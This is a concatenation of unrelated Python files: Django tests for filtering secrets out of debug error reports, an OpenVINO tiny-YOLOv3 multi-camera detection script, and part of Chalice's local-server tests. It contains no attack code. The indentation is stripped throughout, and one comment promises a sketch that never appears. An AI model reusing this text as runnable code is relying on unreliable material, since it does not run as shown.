self.verify_safe_email(sensitive_view)
def test_paranoid_request(self):
"""
Neither POST parameters nor frame variables can be seen in the
default error reports for "paranoid" requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(paranoid_view)
self.verify_unsafe_email(paranoid_view)
with self.settings(DEBUG=False):
self.verify_paranoid_response(paranoid_view)
self.verify_paranoid_email(paranoid_view)
def test_multivalue_dict_key_error(self):
"""
#21098 -- Sensitive POST parameters cannot be seen in the
error reports if request.POST['nonexistent_key'] throws an error.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(multivalue_dict_key_error)
self.verify_unsafe_email(multivalue_dict_key_error)
with self.settings(DEBUG=False):
self.verify_safe_response(multivalue_dict_key_error)
self.verify_safe_email(multivalue_dict_key_error)
def test_custom_exception_reporter_filter(self):
"""
It's possible to assign an exception reporter filter to
the request to bypass the one set in DEFAULT_EXCEPTION_REPORTER_FILTER.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(custom_exception_reporter_filter_view)
self.verify_unsafe_email(custom_exception_reporter_filter_view)
with self.settings(DEBUG=False):
self.verify_unsafe_response(custom_exception_reporter_filter_view)
self.verify_unsafe_email(custom_exception_reporter_filter_view)
def test_sensitive_method(self):
"""
The sensitive_variables decorator works with object methods.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_method_view, check_for_POST_params=False)
self.verify_unsafe_email(sensitive_method_view, check_for_POST_params=False)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_method_view, check_for_POST_params=False)
self.verify_safe_email(sensitive_method_view, check_for_POST_params=False)
def test_sensitive_function_arguments(self):
"""
Sensitive variables don't leak in the sensitive_variables decorator's
frame, when those variables are passed as arguments to the decorated
function.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_args_function_caller)
self.verify_unsafe_email(sensitive_args_function_caller)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_args_function_caller, check_for_POST_params=False)
self.verify_safe_email(sensitive_args_function_caller, check_for_POST_params=False)
def test_sensitive_function_keyword_arguments(self):
"""
Sensitive variables don't leak in the sensitive_variables decorator's
frame, when those variables are passed as keyword arguments to the
decorated function.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_kwargs_function_caller)
self.verify_unsafe_email(sensitive_kwargs_function_caller)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_kwargs_function_caller, check_for_POST_params=False)
self.verify_safe_email(sensitive_kwargs_function_caller, check_for_POST_params=False)
def test_callable_settings(self):
"""
Callable settings should not be evaluated in the debug page (#21345).
"""
def callable_setting():
return "This should not be displayed"
with self.settings(DEBUG=True, FOOBAR=callable_setting):
response = self.client.get('/raises500/')
self.assertNotContains(response, "This should not be displayed", status_code=500)
def test_callable_settings_forbidding_to_set_attributes(self):
"""
Callable settings that forbid setting attributes should not break
the debug page (#23070).
"""
class CallableSettingWithSlots:
__slots__ = []
def __call__(self):
return "This should not be displayed"
with self.settings(DEBUG=True, WITH_SLOTS=CallableSettingWithSlots()):
response = self.client.get('/raises500/')
self.assertNotContains(response, "This should not be displayed", status_code=500)
def test_dict_setting_with_non_str_key(self):
"""
A dict setting containing a non-string key should not break the
debug page (#12744).
"""
with self.settings(DEBUG=True, FOOBAR={42: None}):
response = self.client.get('/raises500/')
self.assertContains(response, 'FOOBAR', status_code=500)
def test_sensitive_settings(self):
"""
The debug page should not show some sensitive settings
(password, secret key, ...).
"""
sensitive_settings = [
'SECRET_KEY',
'PASSWORD',
'API_KEY',
'AUTH_TOKEN',
]
for setting in sensitive_settings:
with self.settings(DEBUG=True, **{setting: "should not be displayed"}):
response = self.client.get('/raises500/')
self.assertNotContains(response, 'should not be displayed', status_code=500)
def test_settings_with_sensitive_keys(self):
"""
The debug page should filter out some sensitive information found in
dict settings.
"""
sensitive_settings = [
'SECRET_KEY',
'PASSWORD',
'API_KEY',
'AUTH_TOKEN',
]
for setting in sensitive_settings:
FOOBAR = {
setting: "should not be displayed",
'recursive': {setting: "should not be displayed"},
}
with self.settings(DEBUG=True, FOOBAR=FOOBAR):
response = self.client.get('/raises500/')
self.assertNotContains(response, 'should not be displayed', status_code=500)
class AjaxResponseExceptionReporterFilter(ExceptionReportTestMixin, LoggingCaptureMixin, SimpleTestCase):
"""
Sensitive information can be filtered out of error reports.
Here we specifically test the plain text 500 debug-only error page served
when the request is detected as coming from JS code. We don't check
for (non)existence of frames vars in the traceback information section of
the response content because we don't include them in these error pages.
Refs #14614.
"""
rf = RequestFactory(HTTP_X_REQUESTED_WITH='XMLHttpRequest')
def test_non_sensitive_request(self):
"""
Request info can be seen in the default error reports for
non-sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(non_sensitive_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_unsafe_response(non_sensitive_view, check_for_vars=False)
def test_sensitive_request(self):
"""
Sensitive POST parameters cannot be seen in the default
error reports for sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_view, check_for_vars=False)
def test_paranoid_request(self):
"""
No POST parameters can be seen in the default error reports
for "paranoid" requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(paranoid_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_paranoid_response(paranoid_view, check_for_vars=False)
def test_custom_exception_reporter_filter(self):
"""
It's possible to assign an exception reporter filter to
the request to bypass the one set in DEFAULT_EXCEPTION_REPORTER_FILTER.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(custom_exception_reporter_filter_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_unsafe_response(custom_exception_reporter_filter_view, check_for_vars=False)
@override_settings(DEBUG=True, ROOT_URLCONF='view_tests.urls')
def test_ajax_response_encoding(self):
response = self.client.get('/raises500/', HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(response['Content-Type'], 'text/plain; charset=utf-8')
class HelperFunctionTests(SimpleTestCase):
def test_cleanse_setting_basic(self):
self.assertEqual(cleanse_setting('TEST', 'TEST'), 'TEST')
self.assertEqual(cleanse_setting('PASSWORD', 'super_secret'), CLEANSED_SUBSTITUTE)
def test_cleanse_setting_ignore_case(self):
self.assertEqual(cleanse_setting('password', 'super_secret'), CLEANSED_SUBSTITUTE)
def test_cleanse_setting_recurses_in_dictionary(self):
initial = {'login': 'cooper', 'password': 'secret'}
expected = {'login': 'cooper', 'password': CLEANSED_SUBSTITUTE}
self.assertEqual(cleanse_setting('SETTING_NAME', initial), expected)
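# Illustrative sketch (not Django's implementation): the kind of recursive
# cleansing that HelperFunctionTests above exercises -- keys matching a
# sensitive pattern get their values replaced, and dict values are cleansed
# recursively. The pattern, substitute string and function name are made up.
import re as _re

SENSITIVE = _re.compile('API|TOKEN|KEY|SECRET|PASS|SIGNATURE', flags=_re.I)
SUBSTITUTE = '********************'

def cleanse(key, value):
    # Non-string keys (e.g. 42) are left alone, matching the dict-setting test.
    if isinstance(key, str) and SENSITIVE.search(key):
        return SUBSTITUTE
    if isinstance(value, dict):
        return {k: cleanse(k, v) for k, v in value.items()}
    return value

if __name__ == '__main__':
    print(cleanse('TEST', 'TEST'))              # 'TEST' -- name is not sensitive
    print(cleanse('password', 'super_secret'))  # replaced by the substitute
    print(cleanse('SETTING_NAME', {'login': 'cooper', 'password': 'secret'}))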
|
openvino_tiny-yolov3_MultiStick_test.py
|
import sys, os, cv2, time, heapq, argparse
import numpy as np, math
from openvino.inference_engine import IENetwork, IEPlugin
import multiprocessing as mp
from time import sleep
import threading
yolo_scale_13 = 13
yolo_scale_26 = 26
yolo_scale_52 = 52
classes = 80
coords = 4
num = 3
anchors = [10,14, 23,27, 37,58, 81,82, 135,169, 344,319]
LABELS = ("person", "bicycle", "car", "motorbike", "aeroplane",
"bus", "train", "truck", "boat", "traffic light",
"fire hydrant", "stop sign", "parking meter", "bench", "bird",
"cat", "dog", "horse", "sheep", "cow",
"elephant", "bear", "zebra", "giraffe", "backpack",
"umbrella", "handbag", "tie", "suitcase", "frisbee",
"skis", "snowboard", "sports ball", "kite", "baseball bat",
"baseball glove", "skateboard", "surfboard","tennis racket", "bottle",
"wine glass", "cup", "fork", "knife", "spoon",
"bowl", "banana", "apple", "sandwich", "orange",
"broccoli", "carrot", "hot dog", "pizza", "donut",
"cake", "chair", "sofa", "pottedplant", "bed",
"diningtable", "toilet", "tvmonitor", "laptop", "mouse",
"remote", "keyboard", "cell phone", "microwave", "oven",
"toaster", "sink", "refrigerator", "book", "clock",
"vase", "scissors", "teddy bear", "hair drier", "toothbrush")
label_text_color = (255, 255, 255)
label_background_color = (125, 175, 75)
box_color = (255, 128, 0)
box_thickness = 1
processes = []
fps = ""
detectfps = ""
framecount = 0
detectframecount = 0
time1 = 0
time2 = 0
lastresults = None
def EntryIndex(side, lcoords, lclasses, location, entry):
n = int(location / (side * side))
loc = location % (side * side)
return int(n * side * side * (lcoords + lclasses + 1) + entry * side * side + loc)
class DetectionObject():
xmin = 0
ymin = 0
xmax = 0
ymax = 0
class_id = 0
confidence = 0.0
def __init__(self, x, y, h, w, class_id, confidence, h_scale, w_scale):
self.xmin = int((x - w / 2) * w_scale)
self.ymin = int((y - h / 2) * h_scale)
self.xmax = int(self.xmin + w * w_scale)
self.ymax = int(self.ymin + h * h_scale)
self.class_id = class_id
self.confidence = confidence
def IntersectionOverUnion(box_1, box_2):
width_of_overlap_area = min(box_1.xmax, box_2.xmax) - max(box_1.xmin, box_2.xmin)
height_of_overlap_area = min(box_1.ymax, box_2.ymax) - max(box_1.ymin, box_2.ymin)
area_of_overlap = 0.0
if (width_of_overlap_area < 0.0 or height_of_overlap_area < 0.0):
area_of_overlap = 0.0
else:
area_of_overlap = width_of_overlap_area * height_of_overlap_area
box_1_area = (box_1.ymax - box_1.ymin) * (box_1.xmax - box_1.xmin)
box_2_area = (box_2.ymax - box_2.ymin) * (box_2.xmax - box_2.xmin)
area_of_union = box_1_area + box_2_area - area_of_overlap
retval = 0.0
if area_of_union <= 0.0:
retval = 0.0
else:
retval = (area_of_overlap / area_of_union)
return retval
def ParseYOLOV3Output(blob, resized_im_h, resized_im_w, original_im_h, original_im_w, threshold, objects):
out_blob_h = blob.shape[2]
out_blob_w = blob.shape[3]
side = out_blob_h
anchor_offset = 0
if side == yolo_scale_13:
anchor_offset = 2 * 3
elif side == yolo_scale_26:
anchor_offset = 2 * 0
side_square = side * side
output_blob = blob.flatten()
for i in range(side_square):
row = int(i / side)
col = int(i % side)
for n in range(num):
obj_index = EntryIndex(side, coords, classes, n * side * side + i, coords)
box_index = EntryIndex(side, coords, classes, n * side * side + i, 0)
scale = output_blob[obj_index]
if (scale < threshold):
continue
x = (col + output_blob[box_index + 0 * side_square]) / side * resized_im_w
y = (row + output_blob[box_index + 1 * side_square]) / side * resized_im_h
height = math.exp(output_blob[box_index + 3 * side_square]) * anchors[anchor_offset + 2 * n + 1]
width = math.exp(output_blob[box_index + 2 * side_square]) * anchors[anchor_offset + 2 * n]
for j in range(classes):
class_index = EntryIndex(side, coords, classes, n * side_square + i, coords + 1 + j)
prob = scale * output_blob[class_index]
if prob < threshold:
continue
obj = DetectionObject(x, y, height, width, j, prob, (original_im_h / resized_im_h), (original_im_w / resized_im_w))
objects.append(obj)
return objects
def camThread(LABELS, results, frameBuffer, camera_width, camera_height, vidfps):
global fps
global detectfps
global lastresults
global framecount
global detectframecount
global time1
global time2
global cam
global window_name
cam = cv2.VideoCapture(0)
if cam.isOpened() != True:
print("USB Camera Open Error!!!")
sys.exit(0)
cam.set(cv2.CAP_PROP_FPS, vidfps)
cam.set(cv2.CAP_PROP_FRAME_WIDTH, camera_width)
cam.set(cv2.CAP_PROP_FRAME_HEIGHT, camera_height)
window_name = "USB Camera"
wait_key_time = 1
#cam = cv2.VideoCapture("data/input/testvideo4.mp4")
#camera_width = int(cam.get(cv2.CAP_PROP_FRAME_WIDTH))
#camera_height = int(cam.get(cv2.CAP_PROP_FRAME_HEIGHT))
#frame_count = int(cam.get(cv2.CAP_PROP_FRAME_COUNT))
#window_name = "Movie File"
#wait_key_time = int(1000 / vidfps)
cv2.namedWindow(window_name, cv2.WINDOW_AUTOSIZE)
while True:
t1 = time.perf_counter()
# USB Camera Stream Read
s, color_image = cam.read()
if not s:
continue
if frameBuffer.full():
frameBuffer.get()
height = color_image.shape[0]
width = color_image.shape[1]
frameBuffer.put(color_image.copy())
if not results.empty():
objects = results.get(False)
detectframecount += 1
for obj in objects:
if obj.confidence < 0.2:
continue
label = obj.class_id
confidence = obj.confidence
if confidence > 0.2:
label_text = LABELS[label] + " (" + "{:.1f}".format(confidence * 100) + "%)"
cv2.rectangle(color_image, (obj.xmin, obj.ymin), (obj.xmax, obj.ymax), box_color, box_thickness)
cv2.putText(color_image, label_text, (obj.xmin, obj.ymin - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.6, label_text_color, 1)
lastresults = objects
else:
if not isinstance(lastresults, type(None)):
for obj in lastresults:
if obj.confidence < 0.2:
continue
label = obj.class_id
confidence = obj.confidence
if confidence > 0.2:
label_text = LABELS[label] + " (" + "{:.1f}".format(confidence * 100) + "%)"
cv2.rectangle(color_image, (obj.xmin, obj.ymin), (obj.xmax, obj.ymax), box_color, box_thickness)
cv2.putText(color_image, label_text, (obj.xmin, obj.ymin - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.6, label_text_color, 1)
cv2.putText(color_image, fps, (width-170,15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (38,0,255), 1, cv2.LINE_AA)
cv2.putText(color_image, detectfps, (width-170,30), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (38,0,255), 1, cv2.LINE_AA)
cv2.imshow(window_name, cv2.resize(color_image, (width, height)))
if cv2.waitKey(wait_key_time)&0xFF == ord('q'):
sys.exit(0)
## Print FPS
framecount += 1
if framecount >= 15:
fps = "(Playback) {:.1f} FPS".format(time1/15)
detectfps = "(Detection) {:.1f} FPS".format(detectframecount/time2)
framecount = 0
detectframecount = 0
time1 = 0
time2 = 0
t2 = time.perf_counter()
elapsedTime = t2-t1
time1 += 1/elapsedTime
time2 += elapsedTime
# l = Search list
# x = Search target value
def searchlist(l, x, notfoundvalue=-1):
if x in l:
return l.index(x)
else:
return notfoundvalue
def async_infer(ncsworker):
#ncsworker.skip_frame_measurement()
while True:
ncsworker.predict_async()
class NcsWorker(object):
def __init__(self, devid, frameBuffer, results, camera_width, camera_height, number_of_ncs, vidfps):
self.devid = devid
self.frameBuffer = frameBuffer
self.model_xml = "./lrmodels/tiny-YoloV3/FP16/frozen_tiny_yolo_v3.xml"
self.model_bin = "./lrmodels/tiny-YoloV3/FP16/frozen_tiny_yolo_v3.bin"
self.camera_width = camera_width
self.camera_height = camera_height
self.m_input_size = 416
self.threshold = 0.2
self.num_requests = 4
self.inferred_request = [0] * self.num_requests
self.heap_request = []
self.inferred_cnt = 0
self.plugin = IEPlugin(device="MYRIAD")
self.net = IENetwork(model=self.model_xml, weights=self.model_bin)
self.input_blob = next(iter(self.net.inputs))
self.exec_net = self.plugin.load(network=self.net, num_requests=self.num_requests)
self.results = results
self.number_of_ncs = number_of_ncs
self.predict_async_time = 800
self.skip_frame = 0
self.roop_frame = 0
self.vidfps = vidfps
def image_preprocessing(self, color_image):
prepimg = cv2.resize(color_image, (self.m_input_size, self.m_input_size))
prepimg = prepimg[np.newaxis, :, :, :] # Batch size axis add
prepimg = prepimg.transpose((0, 3, 1, 2)) # NHWC to NCHW
return prepimg
def skip_frame_measurement(self):
surplustime_per_second = (1000 - self.predict_async_time)
if surplustime_per_second > 0.0:
frame_per_millisecond = (1000 / self.vidfps)
total_skip_frame = surplustime_per_second / frame_per_millisecond
self.skip_frame = int(total_skip_frame / self.num_requests)
else:
self.skip_frame = 0
def predict_async(self):
try:
if self.frameBuffer.empty():
return
self.roop_frame += 1
if self.roop_frame <= self.skip_frame:
self.frameBuffer.get()
return
self.roop_frame = 0
prepimg = self.image_preprocessing(self.frameBuffer.get())
reqnum = searchlist(self.inferred_request, 0)
if reqnum > -1:
self.exec_net.start_async(request_id=reqnum, inputs={self.input_blob: prepimg})
self.inferred_request[reqnum] = 1
self.inferred_cnt += 1
if self.inferred_cnt == sys.maxsize:
self.inferred_request = [0] * self.num_requests
self.heap_request = []
self.inferred_cnt = 0
heapq.heappush(self.heap_request, (self.inferred_cnt, reqnum))
cnt, dev = heapq.heappop(self.heap_request)
if self.exec_net.requests[dev].wait(0) == 0:
self.exec_net.requests[dev].wait(-1)
objects = []
outputs = self.exec_net.requests[dev].outputs
for output in outputs.values():
objects = ParseYOLOV3Output(output, self.m_input_size, self.m_input_size, self.camera_height, self.camera_width, self.threshold, objects)
objlen = len(objects)
for i in range(objlen):
if (objects[i].confidence == 0.0):
continue
for j in range(i + 1, objlen):
if (IntersectionOverUnion(objects[i], objects[j]) >= 0.4):
if objects[i].confidence < objects[j].confidence:
objects[i], objects[j] = objects[j], objects[i]
objects[j].confidence = 0.0
self.results.put(objects)
self.inferred_request[dev] = 0
else:
heapq.heappush(self.heap_request, (cnt, dev))
except:
import traceback
traceback.print_exc()
def inferencer(results, frameBuffer, number_of_ncs, camera_width, camera_height, vidfps):
# Init infer threads
threads = []
for devid in range(number_of_ncs):
thworker = threading.Thread(target=async_infer, args=(NcsWorker(devid, frameBuffer, results, camera_width, camera_height, number_of_ncs, vidfps),))
thworker.start()
threads.append(thworker)
for th in threads:
th.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-numncs','--numberofncs',dest='number_of_ncs',type=int,default=1,help='Number of NCS. (Default=1)')
args = parser.parse_args()
number_of_ncs = args.number_of_ncs
camera_width = 320
camera_height = 240
vidfps = 30
try:
mp.set_start_method('forkserver')
frameBuffer = mp.Queue(10)
results = mp.Queue()
# Start detection MultiStick
# Activation of inferencer
p = mp.Process(target=inferencer, args=(results, frameBuffer, number_of_ncs, camera_width, camera_height, vidfps), daemon=True)
p.start()
processes.append(p)
sleep(number_of_ncs * 7)
# Start streaming
p = mp.Process(target=camThread, args=(LABELS, results, frameBuffer, camera_width, camera_height, vidfps), daemon=True)
p.start()
processes.append(p)
while True:
sleep(1)
except:
import traceback
traceback.print_exc()
finally:
for p in range(len(processes)):
processes[p].terminate()
print("\n\nFinished\n\n")
|
test_local.py
|
import os
import socket
import time
import contextlib
from threading import Thread
from threading import Event
from threading import Lock
import json
import subprocess
from contextlib import contextmanager
import pytest
import mock
import requests
from urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter
from chalice import app
from chalice.awsclient import TypedAWSClient
from chalice.deploy.models import LambdaFunction
from chalice.deploy.packager import LambdaDeploymentPackager
from chalice.deploy.packager import LayerDeploymentPackager
from chalice.docker import LambdaImageBuilder
from chalice.local import create_local_server, DockerPackager
from chalice.local import ContainerProxyResourceManager
from chalice.local import LambdaLayerDownloader
from chalice.config import Config
from chalice.utils import OSUtils, UI
APPS_DIR = os.path.dirname(os.path.abspath(__file__))
ENV_APP_DIR = os.path.join(APPS_DIR, 'envapp')
BASIC_APP = os.path.join(APPS_DIR, 'basicapp')
NEW_APP_VERSION = """
from chalice import Chalice
app = Chalice(app_name='basicapp')
@app.route('/')
def index():
return {'version': 'reloaded'}
"""
@contextmanager
def cd(path):
try:
original_dir = os.getcwd()
os.chdir(path)
yield
finally:
os.chdir(original_dir)
@pytest.fixture()
def basic_app(tmpdir):
tmpdir = str(tmpdir.mkdir('basicapp'))
OSUtils().copytree(BASIC_APP, tmpdir)
return tmpdir
class ThreadedLocalServer(Thread):
def __init__(self, port, host='localhost'):
super(ThreadedLocalServer, self).__init__()
self._app_object = None
self._config = None
self._host = host
self._port = port
self._server = None
self._server_ready = Event()
def wait_for_server_ready(self):
self._server_ready.wait()
def configure(self, app_object, config):
self._app_object = app_object
self._config = config
def run(self):
self._server = create_local_server(
self._app_object, self._config, self._host, self._port)
self._server_ready.set()
self._server.serve_forever()
def make_call(self, method, path, port, timeout=0.5):
self._server_ready.wait()
return method('http://{host}:{port}{path}'.format(
path=path, host=self._host, port=port), timeout=timeout)
def shutdown(self):
if self._server is not None:
self._server.server.shutdown()
@pytest.fixture
def config():
return Config()
@pytest.fixture()
def unused_tcp_port():
with contextlib.closing(socket.socket()) as sock:
sock.bind(('127.0.0.1', 0))
return sock.getsockname()[1]
@pytest.fixture()
def http_session():
session = requests.Session()
retry = Retry(
# How many connection-related errors to retry on.
connect=10,
# A backoff factor to apply between attempts after the second try.
backoff_factor=2,
method_whitelist=['GET', 'POST', 'PUT'],
)
session.mount('http://', HTTPAdapter(max_retries=retry))
return HTTPFetcher(session)
class HTTPFetcher(object):
def __init__(self, session):
self.session = session
def json_get(self, url):
response = self.session.get(url)
response.raise_for_status()
return json.loads(response.content)
@pytest.fixture()
def local_server_factory(unused_tcp_port):
threaded_server = ThreadedLocalServer(unused_tcp_port)
def create_server(app_object, config):
threaded_server.configure(app_object, config)
threaded_server.start()
return threaded_server, unused_tcp_port
try:
yield create_server
finally:
threaded_server.shutdown()
@pytest.fixture
def sample_app():
demo = app.Chalice('demo-app')
thread_safety_check = []
lock = Lock()
@demo.route('/', methods=['GET'])
def index():
return {'hello': 'world'}
@demo.route('/test-cors', methods=['POST'], cors=True)
def test_cors():
return {'hello': 'world'}
@demo.route('/count', methods=['POST'])
def record_counter():
# An extra delay helps ensure we consistently fail if we're
# not thread safe.
time.sleep(0.001)
count = int(demo.current_request.json_body['counter'])
with lock:
thread_safety_check.append(count)
@demo.route('/count', methods=['GET'])
def get_record_counter():
return thread_safety_check[:]
return demo
def test_has_thread_safe_current_request(config, sample_app,
local_server_factory):
local_server, port = local_server_factory(sample_app, config)
local_server.wait_for_server_ready()
num_requests = 25
num_threads = 5
# The idea here is that each requests.post() has a unique 'counter'
# integer. If the current request is thread safe we should see a number
# for each 0 - (num_requests * num_threads). If it's not thread safe
# we'll see missing numbers and/or duplicates.
def make_requests(counter_start):
for i in range(counter_start * num_requests,
(counter_start + 1) * num_requests):
# We're slowing the sending rate down a bit. The threaded
# http server is good, but not great. You can still overwhelm
# it pretty easily.
time.sleep(0.001)
requests.post(
'http://localhost:%s/count' % port, json={'counter': i})
threads = []
for i in range(num_threads):
threads.append(Thread(target=make_requests, args=(i,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
response = requests.get('http://localhost:%s/count' % port)
assert len(response.json()) == len(range(num_requests * num_threads))
assert sorted(response.json()) == list(range(num_requests * num_threads))
def test_can_accept_get_request(config, sample_app, local_server_factory):
local_server, port = local_server_factory(sample_app, config)
response = local_server.make_call(requests.get, '/', port)
assert response.status_code == 200
assert response.text == '{"hello":"world"}'
def test_can_get_unicode_string_content_length(
config, local_server_factory):
demo = app.Chalice('app-name')
@demo.route('/')
def index_view():
return u'\u2713'
local_server, port = local_server_factory(demo, config)
response = local_server.make_call(requests.get, '/', port)
assert response.headers['Content-Length'] == '3'
def test_can_accept_options_request(config, sample_app, local_server_factory):
local_server, port = local_server_factory(sample_app, config)
response = local_server.make_call(requests.options, '/test-cors', port)
assert response.headers['Content-Length'] == '0'
assert response.headers['Access-Control-Allow-Methods'] == 'POST,OPTIONS'
assert response.text == ''
def test_can_accept_multiple_options_request(config, sample_app,
local_server_factory):
local_server, port = local_server_factory(sample_app, config)
response = local_server.make_call(requests.options, '/test-cors', port)
assert response.headers['Content-Length'] == '0'
assert response.headers['Access-Control-Allow-Methods'] == 'POST,OPTIONS'
assert response.text == ''
response = local_server.make_call(requests.options, '/test-cors', port)
assert response.headers['Content-Length'] == '0'
assert response.headers['Access-Control-Allow-Methods'] == 'POST,OPTIONS'
assert response.text == ''
def test_can_accept_multiple_connections(config, sample_app,
local_server_factory):
# When a GET request is made to Chalice from a browser, it will send the
# connection keep-alive header in order to hold the connection open and
# reuse it for subsequent requests. If the connection close header is sent
# back by the server the connection will be closed, but the browser will
# reopen a new connection just in order to have it ready when needed.
# In this case, since it does not send any content we do not have the
# opportunity to send a connection close header back in a response to
# force it to close the socket.
# This is an issue in Chalice since the single threaded local server will
# now be blocked waiting for IO from the browser socket. If a request from
# any other source is made it will be blocked until the browser sends
# another request through, giving us a chance to read from another socket.
# (A threaded-server sketch illustrating one way around this follows this test.)
local_server, port = local_server_factory(sample_app, config)
local_server.wait_for_server_ready()
# We create a socket here to emulate a browser's open connection and then
# make a request. The request should succeed.
socket.create_connection(('localhost', port), timeout=1)
try:
response = local_server.make_call(requests.get, '/', port)
except requests.exceptions.ReadTimeout:
assert False, (
'Read timeout occurred, the socket is blocking the next request '
'from going through.'
)
assert response.status_code == 200
assert response.text == '{"hello":"world"}'
def test_can_import_env_vars(unused_tcp_port, http_session):
with cd(ENV_APP_DIR):
p = subprocess.Popen(['chalice', 'local', '--port',
str(unused_tcp_port)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_wait_for_server_ready(p)
try:
_assert_env_var_loaded(unused_tcp_port, http_session)
finally:
p.terminate()
def _wait_for_server_ready(process):
if process.poll() is not None:
raise AssertionError(
'Local server immediately exited with rc: %s' % process.poll()
)
def _assert_env_var_loaded(port_number, http_session):
response = http_session.json_get('http://localhost:%s/' % port_number)
assert response == {'hello': 'bar'}
def test_can_reload_server(unused_tcp_port, basic_app, http_session):
with cd(basic_app):
p = subprocess.Popen(['chalice', 'local', '--port',
str(unused_tcp_port)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_wait_for_server_ready(p)
url = 'http://localhost:%s/' % unused_tcp_port
try:
assert http_session.json_get(url) == {'version': 'original'}
# Updating the app should trigger a reload.
with open(os.path.join(basic_app, 'app.py'), 'w') as f:
f.write(NEW_APP_VERSION)
time.sleep(2)
assert http_session.json_get(url) == {'version': 'reloaded'}
finally:
p.terminate()
def test_container_proxy_resource_manager_build(basic_app, config):
class DummyLambda(LambdaFunction):
def __init__(self, handler, function_name):
self.handler = handler
self.function_name = function_name
self.resource_name = function_name
ui = mock.Mock(spec=UI)
osutils = mock.Mock(spec=OSUtils)
packager = mock.Mock(spec=DockerPackager)
image_builder = mock.Mock(spec=LambdaImageBuilder)
packager.package_layers.return_value = {
"a": "/path/a",
"b": "/path/b"
}
with cd(basic_app):
resource_manager = ContainerProxyResourceManager(
config, ui, osutils, packager, image_builder)
lambda_functions = [DummyLambda("1", "a"), DummyLambda("2", "b")]
containers = resource_manager.build_resources(lambda_functions)
packager.package_app.assert_called_with()
packager.package_layers.assert_called_with(lambda_functions)
image_builder.build.assert_called_with(config.lambda_python_version)
assert len(containers) == 2
assert 'a' in containers
assert 'b' in containers
def test_container_proxy_resource_manager_cleanup_nothing_no_errors():
config = Config(config_from_disk={"project_dir": "path"})
osutils = mock.Mock(spec=OSUtils)
resource_manager = ContainerProxyResourceManager(
config, None, osutils, None, None
)
resource_manager.cleanup()
class TestLambdaLayerDownloader(object):
@pytest.fixture
def lambda_client(self):
client = mock.Mock(spec=TypedAWSClient)
client.get_layer_version.return_value = {
"Content": {
"Location": "uri"
}
}
return client
@pytest.fixture
def osutils(self):
osutils = mock.Mock(spec=OSUtils)
osutils.joinpath = os.path.join
osutils.file_exists.return_value = False
return osutils
@pytest.fixture
def session(self):
session = mock.Mock(spec=requests.Session)
session.get.return_value.iter_content.return_value = []
return session
@pytest.fixture
def layer_downloader(self, config, lambda_client, osutils, session):
ui = mock.Mock(spec=UI)
layer_downloader = LambdaLayerDownloader(config, ui, lambda_client,
osutils, session)
return layer_downloader
def test_layer_downloader_download_all(self, osutils, lambda_client,
session, layer_downloader,
basic_app, config):
layer_arns = {"arn1", "arn2", "arn3"}
with cd(basic_app):
cache_dir = os.path.join(basic_app, "cache")
os.mkdir(cache_dir)
paths = layer_downloader.download_all(layer_arns, cache_dir)
files = os.listdir(cache_dir)
for file in files:
assert file.startswith("layer-")
python_version = config.lambda_python_version
assert file.endswith("-" + python_version + ".zip")
assert os.path.join(cache_dir, file) in paths
assert len(files) == len(layer_arns)
assert osutils.file_exists.call_count == len(layer_arns)
assert lambda_client.get_layer_version.call_count == len(layer_arns)
assert session.get.call_count == len(layer_arns)
assert len(paths) == len(layer_arns)
def test_layer_downloader_download_one(self, osutils, lambda_client,
session, layer_downloader,
basic_app, config):
with cd(basic_app):
cache_dir = os.path.join(basic_app, "cache")
os.mkdir(cache_dir)
path = layer_downloader.download("layer", cache_dir)
files = os.listdir(cache_dir)
assert len(files) == 1
file = files[0]
assert file.startswith("layer-")
python_version = config.lambda_python_version
assert file.endswith("-" + python_version + ".zip")
assert os.path.join(cache_dir, file) == path
osutils.file_exists.assert_called_once()
lambda_client.get_layer_version.assert_called_once()
session.get.assert_called_once()
def test_layer_downloader_ignores_cached(self, osutils, lambda_client,
session, layer_downloader,
basic_app):
osutils.file_exists.return_value = True
with cd(basic_app):
cache_dir = os.path.join(basic_app, "cache")
os.mkdir(cache_dir)
osutils.file_exists.return_value = True
layer_downloader.download("hello", cache_dir)
files = os.listdir(cache_dir)
assert len(files) == 0
osutils.file_exists.assert_called_once()
lambda_client.get_layer_version.assert_not_called()
session.get.assert_not_called()
def test_layer_downloader_download_invalid_arn_raises_error(
self, lambda_client, layer_downloader, basic_app):
lambda_client.get_layer_version.return_value = {}
with cd(basic_app):
cache_dir = os.path.join(basic_app, "cache")
os.mkdir(cache_dir)
with pytest.raises(ValueError) as e:
layer_downloader.download("hello", cache_dir)
files = os.listdir(cache_dir)
assert len(files) == 0
assert "Invalid layer arn" in str(e.value)
class TestDockerPackager(object):
@pytest.fixture
def config(self, basic_app):
config = Config(
config_from_disk={
'project_dir': basic_app,
'layers': ['hello', 'world', 'layers']
}
)
def dummy_scope(stage, function):
return config
config.scope = dummy_scope
return config
@pytest.fixture
def autolayer_config(self, basic_app):
config = Config(
